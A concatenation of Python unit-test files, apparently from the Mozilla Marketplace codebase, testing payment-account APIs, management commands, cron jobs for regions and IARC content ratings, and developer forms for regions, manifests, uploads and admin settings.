eq_(self.client.post(self.list_url, data={}).status_code, 400)
@patch('mkt.developers.api_payments.get_client')
def test_owner(self, get_client):
client = Mock()
client.api.bango.status.post.return_value = {'status': 1}
get_client.return_value = client
AddonUser.objects.create(addon_id=337141, user_id=self.user.pk)
res = self.client.post(self.list_url, data={})
eq_(res.json['bango']['status'], 'passed')
eq_(res.status_code, 200)
class TestPaymentDebug(AccountCase, RestOAuth):
fixtures = fixture('webapp_337141', 'user_999', 'user_2519')
def setUp(self):
super(TestPaymentDebug, self).setUp()
self.create()
self.payment.account_uri = '/bango/package/1/'
self.payment.save()
self.list_url = reverse('app-payments-debug-list',
kwargs={'pk': 337141})
def test_no_auth(self):
eq_(self.anon.get(self.list_url).status_code, 403)
def test_no_perms(self):
eq_(self.client.get(self.list_url).status_code, 403)
@patch('mkt.developers.api_payments.get_client')
def test_good(self, get_client):
client = Mock()
client.api.bango.debug.get.return_value = {'bango':
{'environment': 'dev'}}
get_client.return_value = client
self.app.update(premium_type=amo.ADDON_FREE_INAPP)
self.grant_permission(self.profile, 'Transaction:Debug')
res = self.client.get(self.list_url)
eq_(res.status_code, 200)
eq_(res.json['bango']['environment'], 'dev')
class Form(forms.Form):
app = forms.ChoiceField(choices=(('valid', 'valid'),))
class TestPaymentAppViewSet(TestCase):
def setUp(self):
self.request = RequestFactory().get('/')
self.viewset = PaymentAppViewSet()
self.viewset.action_map = {}
self.viewset.form = Form
def test_ok(self):
self.viewset.initialize_request(self.request, pk='valid')
ok_(self.viewset.app)
def test_not_ok(self):
self.viewset.initialize_request(self.request, pk='invalid')
eq_(self.viewset.app, None)
########NEW FILE########
__FILENAME__ = test_commands
# -*- coding: utf-8 -*-
from nose.tools import eq_, ok_
import amo
import amo.tests
from addons.models import AddonPremium, Category
import mkt
from mkt.developers.management.commands import (cleanup_addon_premium,
exclude_games, migrate_geodata,
refresh_iarc_ratings,
remove_old_aers)
from mkt.site.fixtures import fixture
from mkt.webapps.models import IARCInfo, RatingDescriptors, Webapp
class TestCommandViews(amo.tests.TestCase):
fixtures = fixture('webapp_337141')
def setUp(self):
self.webapp = Webapp.objects.get(pk=337141)
def test_cleanup_addonpremium(self):
self.make_premium(self.webapp)
eq_(AddonPremium.objects.all().count(), 1)
cleanup_addon_premium.Command().handle()
eq_(AddonPremium.objects.all().count(), 1)
self.webapp.update(premium_type=amo.ADDON_FREE)
cleanup_addon_premium.Command().handle()
eq_(AddonPremium.objects.all().count(), 0)
class TestMigrateGeodata(amo.tests.TestCase):
fixtures = fixture('webapp_337141')
def setUp(self):
self.webapp = Webapp.objects.get(pk=337141)
def test_restricted_no_migration_of_paid_apps_exclusions(self):
self.make_premium(self.webapp)
self.webapp.addonexcludedregion.create(region=mkt.regions.US.id)
eq_(self.webapp.geodata.reload().restricted, False)
migrate_geodata.Command().handle()
eq_(self.webapp.reload().addonexcludedregion.count(), 1)
eq_(self.webapp.geodata.reload().restricted, True)
def test_unrestricted_migration_of_free_apps_exclusions(self):
self.webapp.addonexcludedregion.create(region=mkt.regions.US.id)
eq_(self.webapp.geodata.reload().restricted, False)
migrate_geodata.Command().handle()
eq_(self.webapp.reload().addonexcludedregion.count(), 0)
eq_(self.webapp.geodata.reload().restricted, False)
def test_migration_of_regional_content(self):
# Exclude in everywhere except Brazil.
regions = list(mkt.regions.REGIONS_CHOICES_ID_DICT)
regions.remove(mkt.regions.BR.id)
for region in regions:
self.webapp.addonexcludedregion.create(region=region)
eq_(self.webapp.geodata.reload().popular_region, None)
migrate_geodata.Command().handle()
self.assertSetEqual(self.webapp.reload().addonexcludedregion
.values_list('region', flat=True),
[mkt.regions.CN.id])
eq_(self.webapp.geodata.reload().popular_region, mkt.regions.BR.slug)
class TestExcludeUnratedGames(amo.tests.TestCase):
fixtures = fixture('webapp_337141')
def setUp(self):
self.webapp = Webapp.objects.get(pk=337141)
def _germany_listed(self):
return not self.webapp.geodata.reload().region_de_iarc_exclude
def _brazil_listed(self):
return not self.webapp.geodata.reload().region_br_iarc_exclude
def test_exclude_unrated(self):
amo.tests.make_game(self.webapp, rated=False)
exclude_games.Command().handle()
assert not self._brazil_listed()
assert not self._germany_listed()
def test_dont_exclude_non_game(self):
exclude_games.Command().handle()
assert self._brazil_listed()
assert self._germany_listed()
def test_dont_exclude_rated(self):
amo.tests.make_game(self.webapp, rated=True)
exclude_games.Command().handle()
assert self._brazil_listed()
assert self._germany_listed()
def test_germany_case_generic(self):
amo.tests.make_game(self.webapp, rated=False)
self.webapp.set_content_ratings({
mkt.ratingsbodies.GENERIC: mkt.ratingsbodies.GENERIC_18
})
exclude_games.Command().handle()
assert not self._germany_listed()
assert not self._brazil_listed()
def test_germany_case_usk(self):
amo.tests.make_game(self.webapp, rated=False)
self.webapp.set_content_ratings({
mkt.ratingsbodies.USK: mkt.ratingsbodies.USK_18
})
exclude_games.Command().handle()
assert self._germany_listed()
assert not self._brazil_listed()
def test_brazil_case_classind(self):
amo.tests.make_game(self.webapp, rated=False)
self.webapp.set_content_ratings({
mkt.ratingsbodies.CLASSIND: mkt.ratingsbodies.CLASSIND_L
})
exclude_games.Command().handle()
assert self._brazil_listed()
assert not self._germany_listed()
class TestRemoveOldAERs(amo.tests.TestCase):
fixtures = fixture('webapp_337141')
def setUp(self):
self.webapp = Webapp.objects.get(pk=337141)
self.webapp.addoncategory_set.create(
category=Category.objects.create(slug='games',
type=amo.ADDON_WEBAPP))
def test_delete(self):
self.webapp.addonexcludedregion.create(region=mkt.regions.BR.id)
self.webapp.addonexcludedregion.create(region=mkt.regions.DE.id)
remove_old_aers.Command().handle()
eq_(self.webapp.addonexcludedregion.count(), 0)
def test_user_excluded_no_delete(self):
self.webapp.addonexcludedregion.create(region=mkt.regions.BR.id)
self.webapp.addonexcludedregion.create(region=mkt.regions.DE.id)
self.webapp.addonexcludedregion.create(region=mkt.regions.MX.id)
remove_old_aers.Command().handle()
eq_(self.webapp.addonexcludedregion.count(), 3)
class TestRefreshIARCRatings(amo.tests.TestCase):
fixtures = fixture('webapp_337141')
def setUp(self):
self.webapp = Webapp.objects.get(pk=337141)
def test_refresh_create(self):
IARCInfo.objects.create(
addon=self.webapp, submission_id=52, security_code='FZ32CU8')
refresh_iarc_ratings.Command().handle()
ok_(self.webapp.rating_descriptors)
ok_(self.webapp.rating_interactives)
ok_(self.webapp.content_ratings.count())
def test_refresh_update(self):
IARCInfo.objects.create(
addon=self.webapp, submission_id=52, security_code='FZ32CU8')
rd = RatingDescriptors.objects.create(
addon=self.webapp, has_usk_violence=True)
refresh_iarc_ratings.Command().handle()
ok_(rd.reload().has_esrb_strong_lang)
ok_(not rd.has_usk_violence)
def test_no_cert_no_refresh(self):
refresh_iarc_ratings.Command().handle()
ok_(not self.webapp.content_ratings.count())
def test_single_app(self):
IARCInfo.objects.create(
addon=self.webapp, submission_id=52, security_code='FZ32CU8')
refresh_iarc_ratings.Command().handle(apps=unicode(self.webapp.id))
ok_(self.webapp.content_ratings.count())
########NEW FILE########
__FILENAME__ = test_cron
# -*- coding: utf-8 -*-
import datetime
import mock
from nose.tools import eq_
import amo.tests
from devhub.models import ActivityLog
import mkt
import mkt.constants
from mkt.developers.cron import (_flag_rereview_adult, exclude_new_region,
process_iarc_changes, send_new_region_emails)
from mkt.webapps.models import IARCInfo, RatingDescriptors, RatingInteractives
class TestSendNewRegionEmails(amo.tests.WebappTestCase):
@mock.patch('mkt.developers.cron._region_email')
def test_called(self, _region_email_mock):
self.app.update(enable_new_regions=True)
send_new_region_emails([mkt.regions.UK])
eq_(list(_region_email_mock.call_args_list[0][0][0]), [self.app.id])
@mock.patch('mkt.developers.cron._region_email')
def test_not_called_with_exclusions(self, _region_email_mock):
self.app.addonexcludedregion.create(region=mkt.regions.UK.id)
send_new_region_emails([mkt.regions.UK])
eq_(list(_region_email_mock.call_args_list[0][0][0]), [])
@mock.patch('mkt.developers.cron._region_email')
def test_not_called_with_enable_new_regions_false(self,
_region_email_mock):
"""Check enable_new_regions is False by default."""
eq_(self.app.enable_new_regions, False)
send_new_region_emails([mkt.regions.UK])
eq_(list(_region_email_mock.call_args_list[0][0][0]), [])
class TestExcludeNewRegion(amo.tests.WebappTestCase):
@mock.patch('mkt.developers.cron._region_exclude')
def test_not_called_enable_new_regions_true(self, _region_exclude_mock):
self.app.update(enable_new_regions=True)
exclude_new_region([mkt.regions.UK])
eq_(list(_region_exclude_mock.call_args_list[0][0][0]), [])
@mock.patch('mkt.developers.cron._region_exclude')
def test_not_called_with_ordinary_exclusions(self, _region_exclude_mock):
self.app.addonexcludedregion.create(region=mkt.regions.UK.id)
exclude_new_region([mkt.regions.UK])
eq_(list(_region_exclude_mock.call_args_list[0][0][0]), [])
@mock.patch('mkt.developers.cron._region_exclude')
def test_called_with_enable_new_regions_false(self, _region_exclude_mock):
# Check enable_new_regions is False by default.
eq_(self.app.enable_new_regions, False)
exclude_new_region([mkt.regions.UK])
eq_(list(_region_exclude_mock.call_args_list[0][0][0]), [self.app.id])
class TestIARCChangesCron(amo.tests.TestCase):
@mock.patch('lib.iarc.utils.render_xml')
def test_no_date(self, _render):
process_iarc_changes()
_render.assert_called_with('get_rating_changes.xml', {
'date_from': datetime.date.today() - datetime.timedelta(days=1),
'date_to': datetime.date.today(),
})
@mock.patch('lib.iarc.utils.render_xml')
def test_with_date(self, _render):
date = datetime.date(2001, 1, 11)
process_iarc_changes(date.strftime('%Y-%m-%d'))
_render.assert_called_with('get_rating_changes.xml', {
'date_from': date - datetime.timedelta(days=1),
'date_to': date,
})
def test_processing(self):
"""
The mock client always returns the same data. Set up the app so it
matches the submission ID and verify the data is saved as expected.
"""
amo.set_user(amo.tests.user_factory())
app = amo.tests.app_factory()
IARCInfo.objects.create(addon=app, submission_id=52,
security_code='FZ32CU8')
app.set_descriptors([
'has_classind_violence',
'has_esrb_strong_lang',
'has_pegi_language', 'has_pegi_online',
'has_usk_lang',
])
app.set_content_ratings({
mkt.ratingsbodies.CLASSIND: mkt.ratingsbodies.CLASSIND_L
})
process_iarc_changes()
app = app.reload()
# Check ratings. CLASSIND should get updated.
cr = app.content_ratings.get(
ratings_body=mkt.ratingsbodies.CLASSIND.id)
eq_(cr.rating, mkt.ratingsbodies.CLASSIND_14.id)
cr = app.content_ratings.get(ratings_body=mkt.ratingsbodies.ESRB.id)
eq_(cr.rating, mkt.ratingsbodies.ESRB_M.id)
assert ActivityLog.objects.filter(
action=amo.LOG.CONTENT_RATING_CHANGED.id).count()
# Check descriptors.
rd = RatingDescriptors.objects.get(addon=app)
self.assertSetEqual(rd.to_keys(), [
'has_esrb_strong_lang',
'has_classind_lang', 'has_classind_sex_content',
'has_pegi_lang', 'has_pegi_online',
'has_usk_lang',
])
# Check interactives.
ri = RatingInteractives.objects.get(addon=app)
self.assertSetEqual(ri.to_keys(), [
'has_shares_info', 'has_shares_location', 'has_digital_purchases',
'has_users_interact'
])
def test_rereview_flag_adult(self):
amo.set_user(amo.tests.user_factory())
app = amo.tests.app_factory()
app.set_content_ratings({
mkt.ratingsbodies.ESRB: mkt.ratingsbodies.ESRB_E,
mkt.ratingsbodies.CLASSIND: mkt.ratingsbodies.CLASSIND_18,
})
_flag_rereview_adult(app, mkt.ratingsbodies.ESRB,
mkt.ratingsbodies.ESRB_T)
assert not app.rereviewqueue_set.count()
assert not ActivityLog.objects.filter(
action=amo.LOG.CONTENT_RATING_TO_ADULT.id).exists()
# Adult should get flagged to rereview.
_flag_rereview_adult(app, mkt.ratingsbodies.ESRB,
mkt.ratingsbodies.ESRB_A)
eq_(app.rereviewqueue_set.count(), 1)
eq_(ActivityLog.objects.filter(
action=amo.LOG.CONTENT_RATING_TO_ADULT.id).count(), 1)
# Test things same same if rating stays the same as adult.
app.set_content_ratings({
mkt.ratingsbodies.ESRB: mkt.ratingsbodies.ESRB_A,
})
_flag_rereview_adult(app, mkt.ratingsbodies.ESRB,
mkt.ratingsbodies.ESRB_A)
eq_(app.rereviewqueue_set.count(), 1)
eq_(ActivityLog.objects.filter(
action=amo.LOG.CONTENT_RATING_TO_ADULT.id).count(), 1)
########NEW FILE########
__FILENAME__ = test_forms
# -*- coding: utf-8 -*-
import json
import os
import shutil
from django import forms as django_forms
from django.conf import settings
from django.core.files.storage import default_storage as storage
from django.core.files.uploadedfile import SimpleUploadedFile
import mock
from nose.tools import eq_, ok_
from test_utils import RequestFactory
import amo
import amo.tests
from amo.tests import app_factory, version_factory
from amo.tests.test_helpers import get_image_path
from addons.models import Addon, AddonCategory, Category
from tags.models import Tag
from translations.models import Translation
from users.models import UserProfile
import mkt
from mkt.developers import forms
from mkt.developers.tests.test_views_edit import TestAdmin
from mkt.files.helpers import copyfileobj
from mkt.site.fixtures import fixture
from mkt.webapps.models import Geodata, IARCInfo, Webapp
class TestPreviewForm(amo.tests.TestCase):
fixtures = ['base/addon_3615']
def setUp(self):
self.addon = Addon.objects.get(pk=3615)
self.dest = os.path.join(settings.TMP_PATH, 'preview')
if not os.path.exists(self.dest):
os.makedirs(self.dest)
@mock.patch('amo.models.ModelBase.update')
def test_preview_modified(self, update_mock):
name = 'transparent.png'
form = forms.PreviewForm({'upload_hash': name,
'position': 1})
shutil.copyfile(get_image_path(name), os.path.join(self.dest, name))
assert form.is_valid(), form.errors
form.save(self.addon)
assert update_mock.called
def test_preview_size(self):
name = 'non-animated.gif'
form = forms.PreviewForm({'upload_hash': name,
'position': 1})
with storage.open(os.path.join(self.dest, name), 'wb') as f:
copyfileobj(open(get_image_path(name)), f)
assert form.is_valid(), form.errors
form.save(self.addon)
eq_(self.addon.previews.all()[0].sizes,
{u'image': [250, 297], u'thumbnail': [100, 119]})
def check_file_type(self, type_):
form = forms.PreviewForm({'upload_hash': type_,
'position': 1})
assert form.is_valid(), form.errors
form.save(self.addon)
return self.addon.previews.all()[0].filetype
@mock.patch('lib.video.tasks.resize_video')
def test_preview_good_file_type(self, resize_video):
eq_(self.check_file_type('x.video-webm'), 'video/webm')
def test_preview_other_file_type(self):
eq_(self.check_file_type('x'), 'image/png')
def test_preview_bad_file_type(self):
eq_(self.check_file_type('x.foo'), 'image/png')
class TestCategoryForm(amo.tests.WebappTestCase):
fixtures = fixture('user_999', 'webapp_337141')
def setUp(self):
super(TestCategoryForm, self).setUp()
self.user = UserProfile.objects.get(username='regularuser')
self.app = Webapp.objects.get(pk=337141)
self.request = RequestFactory()
self.request.user = self.user
self.request.groups = ()
self.cat = Category.objects.create(type=amo.ADDON_WEBAPP)
def _make_form(self, data=None):
self.form = forms.CategoryForm(
data, product=self.app, request=self.request)
def _cat_count(self):
return self.form.fields['categories'].queryset.count()
def test_has_no_cats(self):
self._make_form()
eq_(self._cat_count(), 1)
eq_(self.form.max_categories(), 2)
def test_save_cats(self):
self._make_form({'categories':
map(str, Category.objects.filter(type=amo.ADDON_WEBAPP)
.values_list('id', flat=True))})
assert self.form.is_valid(), self.form.errors
self.form.save()
eq_(AddonCategory.objects.filter(addon=self.app).count(),
Category.objects.count())
eq_(self.form.max_categories(), 2)
class TestRegionForm(amo.tests.WebappTestCase):
fixtures = fixture('webapp_337141')
def setUp(self):
super(TestRegionForm, self).setUp()
self.request = RequestFactory()
self.kwargs = {'product': self.app}
def test_initial_empty(self):
form = forms.RegionForm(data=None, **self.kwargs)
self.assertSetEqual(form.initial['regions'],
set(mkt.regions.ALL_REGION_IDS) -
set(mkt.regions.SPECIAL_REGION_IDS))
eq_(form.initial['enable_new_regions'], False)
def test_initial_excluded_in_region(self):
self.app.addonexcludedregion.create(region=mkt.regions.BR.id)
# Everything except Brazil.
regions = set(mkt.regions.ALL_REGION_IDS)
regions.remove(mkt.regions.BR.id)
self.assertSetEqual(self.get_app().get_region_ids(restofworld=True),
regions)
form = forms.RegionForm(data=None, **self.kwargs)
# Everything except Brazil and China.
self.assertSetEqual(form.initial['regions'],
regions - set(mkt.regions.SPECIAL_REGION_IDS))
eq_(form.initial['enable_new_regions'], False)
def test_initial_excluded_in_regions_and_future_regions(self):
regions = [mkt.regions.BR, mkt.regions.UK, mkt.regions.RESTOFWORLD]
for region in regions:
self.app.addonexcludedregion.create(region=region.id)
regions = set(mkt.regions.ALL_REGION_IDS)
regions.remove(mkt.regions.BR.id)
regions.remove(mkt.regions.UK.id)
regions.remove(mkt.regions.RESTOFWORLD.id)
self.assertSetEqual(self.get_app().get_region_ids(),
regions)
form = forms.RegionForm(data=None, **self.kwargs)
self.assertSetEqual(form.initial['regions'],
regions - set(mkt.regions.SPECIAL_REGION_IDS))
eq_(form.initial['enable_new_regions'], False)
def test_restofworld_only(self):
form = forms.RegionForm({'regions': [mkt.regions.RESTOFWORLD.id]},
**self.kwargs)
assert form.is_valid(), form.errors
def test_no_regions(self):
form = forms.RegionForm({'enable_new_regions': True}, **self.kwargs)
assert not form.is_valid(), 'Form should be invalid'
eq_(form.errors,
{'regions': ['You must select at least one region.']})
def test_exclude_each_region(self):
"""Test that it's possible to exclude each region."""
for region_id in mkt.regions.ALL_REGION_IDS:
to_exclude = list(mkt.regions.ALL_REGION_IDS)
to_exclude.remove(region_id)
form = forms.RegionForm({'regions': to_exclude,
'restricted': '1',
'enable_new_regions': True},
**self.kwargs)
assert form.is_valid(), form.errors
form.save()
r_id = mkt.regions.REGIONS_CHOICES_ID_DICT[region_id]
eq_(self.app.reload().get_region_ids(True), to_exclude,
'Failed for %s' % r_id)
def test_exclude_restofworld(self):
form = forms.RegionForm({'regions': mkt.regions.REGION_IDS,
'restricted': '1',
'enable_new_regions': False}, **self.kwargs)
assert form.is_valid(), form.errors
form.save()
eq_(self.app.get_region_ids(True), mkt.regions.REGION_IDS)
def test_reinclude_region(self):
self.app.addonexcludedregion.create(region=mkt.regions.BR.id)
form = forms.RegionForm({'regions': mkt.regions.ALL_REGION_IDS,
'enable_new_regions': True}, **self.kwargs)
assert form.is_valid(), form.errors
form.save()
eq_(self.app.get_region_ids(True), mkt.regions.ALL_REGION_IDS)
def test_reinclude_restofworld(self):
self.app.addonexcludedregion.create(
region=mkt.regions.RESTOFWORLD.id)
form = forms.RegionForm({'regions': mkt.regions.ALL_REGION_IDS},
**self.kwargs)
assert form.is_valid(), form.errors
form.save()
eq_(self.app.get_region_ids(True), mkt.regions.ALL_REGION_IDS)
def test_restofworld_valid_choice_paid(self):
self.app.update(premium_type=amo.ADDON_PREMIUM)
form = forms.RegionForm(
{'regions': [mkt.regions.RESTOFWORLD.id]}, **self.kwargs)
assert form.is_valid(), form.errors
def test_restofworld_valid_choice_free(self):
form = forms.RegionForm(
{'regions': [mkt.regions.RESTOFWORLD.id]}, **self.kwargs)
assert form.is_valid(), form.errors
def test_china_initially_excluded_if_null(self):
self.create_flag('special-regions')
form = forms.RegionForm(None, **self.kwargs)
cn = mkt.regions.CN.id
assert cn not in form.initial['regions']
assert cn in dict(form.fields['regions'].choices).keys()
def _test_china_excluded_if_pending_or_rejected(self):
self.create_flag('special-regions')
# Mark app as pending/rejected in China.
for status in (amo.STATUS_PENDING, amo.STATUS_REJECTED):
self.app.geodata.set_status(mkt.regions.CN, status, save=True)
eq_(self.app.geodata.get_status(mkt.regions.CN), status)
# Post the form.
form = forms.RegionForm({'regions': mkt.regions.ALL_REGION_IDS,
'special_regions': [mkt.regions.CN.id]},
**self.kwargs)
# China should be checked if it's pending and
# unchecked if rejected.
cn = mkt.regions.CN.id
if status == amo.STATUS_PENDING:
assert cn in form.initial['regions'], (
status, form.initial['regions'])
else:
assert cn not in form.initial['regions'], (
status, form.initial['regions'])
choices = dict(form.fields['regions'].choices).keys()
assert cn in choices, (status, choices)
assert form.is_valid(), form.errors
form.save()
# App should be unlisted in China and always pending after
# requesting China.
self.app = self.app.reload()
eq_(self.app.listed_in(mkt.regions.CN), False)
eq_(self.app.geodata.get_status(mkt.regions.CN),
amo.STATUS_PENDING)
def test_china_excluded_if_pending_or_rejected(self):
self._test_china_excluded_if_pending_or_rejected()
def test_china_already_excluded_and_pending_or_rejected(self):
cn = mkt.regions.CN.id
self.app.addonexcludedregion.create(region=cn)
# If the app was already excluded in China, the checkbox should still
# be checked if the app's been requested for approval in China now.
self._test_china_excluded_if_pending_or_rejected()
def test_china_excluded_if_pending_cancelled(self):
"""
If the developer already requested to be in China,
and a reviewer hasn't reviewed it for China yet,
keep the region exclusion and the status as pending.
"""
self.create_flag('special-regions')
# Mark app as pending in China.
status = amo.STATUS_PENDING
self.app.geodata.set_status(mkt.regions.CN, status, save=True)
eq_(self.app.geodata.get_status(mkt.regions.CN), status)
# Post the form.
form = forms.RegionForm({'regions': mkt.regions.ALL_REGION_IDS},
**self.kwargs)
# China should be checked if it's pending.
cn = mkt.regions.CN.id
assert cn in form.initial['regions']
assert cn in dict(form.fields['regions'].choices).keys()
assert form.is_valid(), form.errors
form.save()
# App should be unlisted in China and now null.
self.app = self.app.reload()
eq_(self.app.listed_in(mkt.regions.CN), False)
eq_(self.app.geodata.get_status(mkt.regions.CN), amo.STATUS_NULL)
def test_china_included_if_approved_but_unchecked(self):
self.create_flag('special-regions')
# Mark app as public in China.
status = amo.STATUS_PUBLIC
self.app.geodata.set_status(mkt.regions.CN, status, save=True)
eq_(self.app.geodata.get_status(mkt.regions.CN), status)
# Post the form.
form = forms.RegionForm({'regions': mkt.regions.ALL_REGION_IDS},
**self.kwargs)
# China should be checked if it's public.
cn = mkt.regions.CN.id
assert cn in form.initial['regions']
assert cn in dict(form.fields['regions'].choices).keys()
assert form.is_valid(), form.errors
form.save()
# App should be unlisted in China and now null.
self.app = self.app.reload()
eq_(self.app.listed_in(mkt.regions.CN), False)
eq_(self.app.geodata.get_status(mkt.regions.CN), amo.STATUS_NULL)
def test_china_included_if_approved_and_checked(self):
self.create_flag('special-regions')
# Mark app as public in China.
status = amo.STATUS_PUBLIC
self.app.geodata.set_status(mkt.regions.CN, status, save=True)
eq_(self.app.geodata.get_status(mkt.regions.CN), status)
# Post the form.
form = forms.RegionForm({'regions': mkt.regions.ALL_REGION_IDS,
'special_regions': [mkt.regions.CN.id]},
**self.kwargs)
assert form.is_valid(), form.errors
form.save()
# App should still be listed in China and still public.
self.app = self.app.reload()
eq_(self.app.listed_in(mkt.regions.CN), True)
eq_(self.app.geodata.get_status(mkt.regions.CN), status)
class TestNewManifestForm(amo.tests.TestCase):
@mock.patch('mkt.developers.forms.verify_app_domain')
def test_normal_validator(self, _verify_app_domain):
form = forms.NewManifestForm({'manifest': 'http://omg.org/yes.webapp'},
is_standalone=False)
assert form.is_valid()
assert _verify_app_domain.called
@mock.patch('mkt.developers.forms.verify_app_domain')
def test_standalone_validator(self, _verify_app_domain):
form = forms.NewManifestForm({'manifest': 'http://omg.org/yes.webapp'},
is_standalone=True)
assert form.is_valid()
assert not _verify_app_domain.called
class TestPackagedAppForm(amo.tests.AMOPaths, amo.tests.WebappTestCase):
def setUp(self):
super(TestPackagedAppForm, self).setUp()
path = self.packaged_app_path('mozball.zip')
self.files = {'upload': SimpleUploadedFile('mozball.zip',
open(path).read())}
def test_not_there(self):
form = forms.NewPackagedAppForm({}, {})
assert not form.is_valid()
eq_(form.errors['upload'], [u'This field is required.'])
eq_(form.file_upload, None)
def test_right_size(self):
form = forms.NewPackagedAppForm({}, self.files)
assert form.is_valid(), form.errors
assert form.file_upload
def test_too_big(self):
form = forms.NewPackagedAppForm({}, self.files, max_size=5)
assert not form.is_valid()
validation = json.loads(form.file_upload.validation)
assert 'messages' in validation, 'No messages in validation.'
eq_(validation['messages'][0]['message'],
u'Packaged app too large for submission. Packages must be smaller '
u'than 5 bytes.')
def test_origin_exists(self):
self.app.update(app_domain='app://hy.fr')
form = forms.NewPackagedAppForm({}, self.files)
assert not form.is_valid()
validation = json.loads(form.file_upload.validation)
eq_(validation['messages'][0]['message'],
'An app already exists on this domain; only one app per domain is '
'allowed.')
class TestTransactionFilterForm(amo.tests.TestCase):
def setUp(self):
(app_factory(), app_factory())
# Need queryset to initialize form.
self.apps = Webapp.objects.all()
self.data = {
'app': self.apps[0].id,
'transaction_type': 1,
'transaction_id': 1,
'date_from_day': '1',
'date_from_month': '1',
'date_from_year': '2012',
'date_to_day': '1',
'date_to_month': '1',
'date_to_year': '2013',
}
def test_basic(self):
"""Test the form doesn't crap out."""
form = forms.TransactionFilterForm(self.data, apps=self.apps)
assert form.is_valid(), form.errors
def test_app_choices(self):
"""Test app choices."""
form = forms.TransactionFilterForm(self.data, apps=self.apps)
for app in self.apps:
assertion = (app.id, app.name) in form.fields['app'].choices
assert assertion, '(%s, %s) not in choices' % (app.id, app.name)
class TestAppFormBasic(amo.tests.TestCase):
def setUp(self):
self.data = {
'slug': 'yolo',
'manifest_url': 'https://omg.org/yes.webapp',
'description': 'You Only Live Once'
}
self.request = mock.Mock()
self.request.groups = ()
def post(self):
self.form = forms.AppFormBasic(
self.data, instance=Webapp.objects.create(app_slug='yolo'),
request=self.request)
def test_success(self):
self.post()
eq_(self.form.is_valid(), True, self.form.errors)
eq_(self.form.errors, {})
def test_slug_invalid(self):
Webapp.objects.create(app_slug='yolo')
self.post()
eq_(self.form.is_valid(), False)
eq_(self.form.errors,
{'slug': ['This slug is already in use. Please choose another.']})
class TestAppVersionForm(amo.tests.TestCase):
def setUp(self):
self.request = mock.Mock()
self.app = app_factory(make_public=amo.PUBLIC_IMMEDIATELY,
version_kw={'version': '1.0',
'created': self.days_ago(5)})
version_factory(addon=self.app, version='2.0',
file_kw=dict(status=amo.STATUS_PENDING))
self.app.reload()
def _get_form(self, version, data=None):
return forms.AppVersionForm(data, instance=version)
def test_get_publish(self):
form = self._get_form(self.app.latest_version)
eq_(form.fields['publish_immediately'].initial, True)
self.app.update(make_public=amo.PUBLIC_WAIT)
self.app.reload()
form = self._get_form(self.app.latest_version)
eq_(form.fields['publish_immediately'].initial, False)
def test_post_publish(self):
# Using the latest_version, which is pending.
form = self._get_form(self.app.latest_version,
data={'publish_immediately': True})
eq_(form.is_valid(), True)
form.save()
self.app.reload()
eq_(self.app.make_public, amo.PUBLIC_IMMEDIATELY)
form = self._get_form(self.app.latest_version,
data={'publish_immediately': False})
eq_(form.is_valid(), True)
form.save()
self.app.reload()
eq_(self.app.make_public, amo.PUBLIC_WAIT)
def test_post_publish_not_pending(self):
# Using the current_version, which is public.
form = self._get_form(self.app.current_version,
data={'publish_immediately': False})
eq_(form.is_valid(), True)
form.save()
self.app.reload()
eq_(self.app.make_public, amo.PUBLIC_IMMEDIATELY)
class TestAdminSettingsForm(TestAdmin):
def setUp(self):
super(TestAdminSettingsForm, self).setUp()
self.data = {'position': 1}
self.user = UserProfile.objects.get(username='admin')
self.request = RequestFactory()
self.request.user = self.user
self.request.groups = ()
self.kwargs = {'instance': self.webapp, 'request': self.request}
@mock.patch('mkt.developers.forms.index_webapps.delay')
def test_reindexed(self, index_webapps_mock):
form = forms.AdminSettingsForm(self.data, **self.kwargs)
assert form.is_valid(), form.errors
form.save(self.webapp)
index_webapps_mock.assert_called_with([self.webapp.id])
def test_adding_tags(self):
self.data.update({'tags': 'tag one, tag two'})
form = forms.AdminSettingsForm(self.data, **self.kwargs)
assert form.is_valid(), form.errors
form.save(self.webapp)
eq_(self.webapp.tags.count(), 2)
self.assertSetEqual(
self.webapp.tags.values_list('tag_text', flat=True),
['tag one', 'tag two'])
def test_removing_tags(self):
Tag(tag_text='tag one').save_tag(self.webapp)
eq_(self.webapp.tags.count(), 1)
self.data.update({'tags': 'tag two, tag three'})
form = forms.AdminSettingsForm(self.data, **self.kwargs)
assert form.is_valid(), form.errors
form.save(self.webapp)
eq_(self.webapp.tags.count(), 2)
self.assertSetEqual(
self.webapp.tags.values_list('tag_text', flat=True),
['tag two', 'tag three'])
def test_removing_all_tags(self):
Tag(tag_text='tag one').save_tag(self.webapp)
eq_(self.webapp.tags.count(), 1)
self.data.update({'tags': ''})
form = forms.AdminSettingsForm(self.data, **self.kwargs)
assert form.is_valid(), form.errors
form.save(self.webapp)
eq_(self.webapp.tags.count(), 0)
self.assertSetEqual(
self.webapp.tags.values_list('tag_text', flat=True), [])
def test_banner_message(self):
self.data.update({
'banner_message_en-us': u'Oh Hai.',
'banner_message_es': u'¿Dónde está la biblioteca?',
})
form = forms.AdminSettingsForm(self.data, **self.kwargs)
assert form.is_valid(), form.errors
form.save(self.webapp)
geodata = self.webapp.geodata.reload()
trans_id = geodata.banner_message_id
eq_(geodata.banner_message, self.data['banner_message_en-us'])
eq_(unicode(Translation.objects.get(id=trans_id, locale='es')),
self.data['banner_message_es'])
eq_(unicode(Translation.objects.get(id=trans_id, locale='en-us')),
self.data['banner_message_en-us'])
def test_banner_regions_garbage(self):
self.data.update({
'banner_regions': ['LOL']
})
form = forms.AdminSettingsForm(self.data, **self.kwargs)
assert not form.is_valid(), form.errors
def test_banner_regions_valid(self): # Use strings
self.data.update({
'banner_regions': [unicode(mkt.regions.BR.id),
mkt.regions.SPAIN.id]
})
self.webapp.geodata.update(banner_regions=[mkt.regions.RS.id])
form = forms.AdminSettingsForm(self.data, **self.kwargs)
eq_(form.initial['banner_regions'], [mkt.regions.RS.id])
assert form.is_valid(), form.errors
eq_(form.cleaned_data['banner_regions'], [mkt.regions.BR.id,
mkt.regions.SPAIN.id])
form.save(self.webapp)
geodata = self.webapp.geodata.reload()
eq_(geodata.banner_regions, [mkt.regions.BR.id, mkt.regions.SPAIN.id])
def test_banner_regions_initial(self):
form = forms.AdminSettingsForm(self.data, **self.kwargs)
eq_(self.webapp.geodata.banner_regions, None)
eq_(form.initial['banner_regions'], [])
self.webapp.geodata.update(banner_regions=[])
form = forms.AdminSettingsForm(self.data, **self.kwargs)
eq_(form.initial['banner_regions'], [])
class TestIARCGetAppInfoForm(amo.tests.WebappTestCase):
def _get_form(self, app=None, **kwargs):
data = {
'submission_id': 1,
'security_code': 'a'
}
